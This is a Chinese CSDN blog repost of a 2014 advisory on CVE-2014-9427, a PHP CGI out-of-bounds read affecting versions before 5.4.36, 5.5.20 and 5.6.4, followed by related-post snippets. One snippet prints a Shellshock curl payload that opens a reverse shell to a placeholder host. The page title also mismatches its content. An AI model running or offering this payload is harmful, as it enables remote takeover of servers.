php防止权限越界,PHP 'cgi_main.c'越界读拒绝服务漏洞

最新推荐文章于 2023-04-11 23:01:35 发布
最新推荐文章于 2023-04-11 23:01:35 发布
阅读量186 收藏
点赞数
文章标签: php防止权限越界
这篇博客介绍了2014年PHP中发现的安全漏洞,影响PHP 5.4.36之前的版本、5.5.20之前的版本和5.6.4之前的版本。攻击者可以利用该漏洞导致服务崩溃,执行任意代码。漏洞编号为BUGTRAQ ID:71833和CVE-2014-9427。PHP官方已发布补丁,建议用户及时更新以防止被利用。
摘要由CSDN通过智能技术生成

发布日期:2014-12-31

更新日期:2015-01-04

受影响系统:

PHP PHP < 5.6.4

PHP PHP < 5.5.20

PHP PHP < 5.4.36

描述:

BUGTRAQ  ID: 71833

CVE(CAN) ID: CVE-2014-9427

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP 5.4.36之前版本、5.5.20之前版本、5.6.4之前版本在实现上存在拒绝服务漏洞,攻击者可利用此漏洞使受影响应用崩溃。在mmap用于读取.php文件时,CGI组件内的sapi/cgi/cgi_main.c对于以#开头的字符并缺少新行字符的无效文件,没有正确考虑映射长度,这可造成越界读、泄露php-cgi内存的敏感信息、任意代码执行等。

*>

建议:

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

PHP 的详细介绍:请点这里

PHP 的下载地址:请点这里

0b1331709591d260c1c78e86d0c51c18.png

刘良运
关注
who.rar_iam.c whoami.c_who.c whoami.c iam.c
09-23
在IT行业中,系统调用是操作系统提供给用户程序的一个接口,允许它们请求操作系统执行特定的服务。在这个场景中,我们关注的是三个源代码文件:`who.c`、`whoami.c` 和 `iam.c`,它们可能涉及到Linux或类UNIX系统的...
php cgi.sock 权限,php-fpm sock文件权限设置
weixin_33662430的博客
03-10 215
在编译php-fpm时,若没有指定fpm用户,在配置文件中也没有指定用户,则sock文件会由root(启动php-fpm的用户)创建,其权限是srw-rw----。而nginx一般由nginx用户启动,会导致无法取sock文件,造成nginx返回502错误。nginx日志会记录错误如下:2018/09/12 17:06:17 [crit] 30735#0: *1 connect() to uni...
php 执行root权限命令无效的问题,webCGI执行root命令权限的问题
abc595951988的博客
05-15 1004
apache错误日志 sudo: no tty present and no askpass program specified 问题,failed: Operation not permitted 问题cgi执行root命令的权限问题vim /etc/sudoers将 Defaults requiretty改为#Defaults requiretty注释掉增加一行httpd(web用...
php cgi.sock 权限,php配置 php-cgi.sock使用
weixin_33507732的博客
03-10 514
php配置 php-cgi.SOCk使用PHP配置文件:[global]pid = /run/php-fpm/php-fpm.piderror_log = /var/log/php-fpm/php-fpm.loglog_level = notice[www]&nBSP;listen = /dev/shm/php-cgi.socklisten.backlog = -1listen.allow...
fastcgi未授权访问漏洞(php-fpm fast-cgi未授权访问漏洞)
好好睡觉
02-10 3948
fastcgi未授权访问漏洞
php-cgi.sock 权限,求助apache+PHP5.6中关于php-cgi.sock的问题
weixin_35333277的博客
03-10 436
今天尝试在虚拟服务器上用wordpress搭建博客,首先在云服务器安装了宝塔linux面板,然后用面板安装了LAMP(apache为2.4版本),一开始安装的是PHP5.4,后来安装wordpress时提示最少需要PHP5.6,就卸载了5.4安装5.6,域名解析什么的的都完成了,尝试访问服务器,但是报错Service Unavailable,之后查看服务器日志发现了以下两个错误:[Sat Aug ...
if_pppolac.rar_If...
09-23
标题中的"if_pppolac.rar_...6. **错误处理**:检查迭代器是否越界防止非法访问或在集合已修改时使用失效的迭代器。 通过对这些知识点的理解和应用,开发者可以有效地操作和检查可变集合,确保代码的正确性和效率。
C_1.1_dft.zip_C语言实现dft
09-24
**C语言实现离散傅立叶变换(DFT)** 离散傅立叶变换(Discrete Fourier Transform, DFT)是数字信号处理中的一个重要概念,它将一个离散时间信号转换到频域,揭示了信号在不同频率成分上的分布。DFT在音频分析、图像...
Embedded_C_Programer_.rar_c语言编程规范
09-21
文档中提到的《C语言嵌入式系统编程修炼之道》系列可能涵盖了这些主题的详细讲解,包括如何处理特定的嵌入式问题,如中断服务例程的编写、内存管理策略、以及如何优化性能等。 总的来说,遵循C语言编程规范对于...
jiancha.rar_数组 越界 检查
09-14
在实际项目中,除了在类中进行越界检查,还可以结合编译器警告、静态代码分析工具以及单元测试来进一步防止数组越界问题。这些工具可以帮助开发者在代码编写阶段就发现潜在的问题,提高代码质量。 总结来说,...
php-fpm 单独运行,Nginx多站点虚拟主机实现单独启动停止php-fpm、单独控制权限设置...
weixin_29021195的博客
03-22 244
Nginx多站点虚拟主机实现单独启动停止php-fpm、单独控制权限设置说明:站点1:bbs.osyunwei.com 程序所在目录/data/osyunwei/bbs站点2:sns.osyunwei.com 程序所在目录/data/osyunwei/sns相关配置文件目录:nginx主配置文件:/usr/local/nginx/conf/nginx.confphp安装目录:/usr/loca...
如何防止php漏洞,关于PHP漏洞以及如何防止PHP漏洞
weixin_32211599的博客
03-19 449
【IT168 评论】漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露、cookie伪造、CSRF(跨站请求)等。这些漏洞不仅仅是针对PHP语言的,本文只是简单介绍PHP如何有效防止这些漏洞。1.xss + sql注入(关于xss攻击详细介绍)其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注...
php cve-2014-9427漏洞,GNU Bash环境变量远程任意代码执行漏洞CVE-2014-6271
weixin_29255731的博客
04-02 836
ps:利用payloadcurl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"发布日期:2014-09-25CVE ID:CVE-2014-6271受影响的软件及系统:==================...
e7xue.php漏洞_php5.4.3版本 远程代码执行漏洞
weixin_39737831的博客
12-21 389
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令用这个提权是不是很方便了?保存php文件,代码:// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)em...
php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用
weixin_42365539的博客
03-13 828
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令用这个提权是不是很方便了?// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)email(at)gmai...
PHP常见函数漏洞
Elite的博客
04-11 3330
常见的PHP特性(bug)总结,干货满满哦
php组件缓冲区溢出漏洞,CVE-2014-9427
weixin_39917437的博客
03-12 354
Description:------------I cloned the php git repo on 12/16/2014 and built from source using the afl-gcc compiler:CC=/path/to/afl-gcc ./configureAFL_HARDEN=1 makePHP 7.0.0-dev (cgi-fcgi) (built: Dec 16...
php5.2.6 漏洞,PHP 5.2.6 (error_log) safe_mode bypass
weixin_42501881的博客
04-09 381
[ PHP 5.2.6 (error_log) safe_mode bypass ]Author: Maksymilian ArciemowiczDate:- - Written: 10.11.2008- - Public: 20.11.2008CWE: CWE-264Risk: Medium- --- 0.Description ---PHP is an HTML-embedded script...
data = self.conformity_main.tbw_convertlist.item(i,j).text() AttributeError: 'NoneType' object has no attribute 'text'
最新发布
09-27
这个错误提示 "AttributeError: 'NoneType' object has no attribute 'text'" 表示你在尝试从一个 `None` 类型的对象上调用 `text()` 方法。这通常发生在 Python 中当你试图访问列表、字典或其他序列类型的元素,但该元素实际上不存在,即它是一个空值或 None。 在这个特定的代码片段 `data = self.conformity_main.tbw_convertlist.item(i,j).text()` 中,`tbw_convertlist.item(i,j)` 可能返回的是 `None`,因为索引 `(i, j)` 找不到有效的数据。解决这个问题,你需要检查索引是否越界,或者在访问之前先检查 `item(i,j)` 是否已经赋值了非 `None` 的值: ```python # 先判断item是否存在再进行文本获取 if tbw_convertlist is not None and tbw_convertlist.item(i, j) is not None: data = tbw_convertlist.item(i, j).text() else: # 设置默认值或处理异常情况 data = None or "Item not found" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值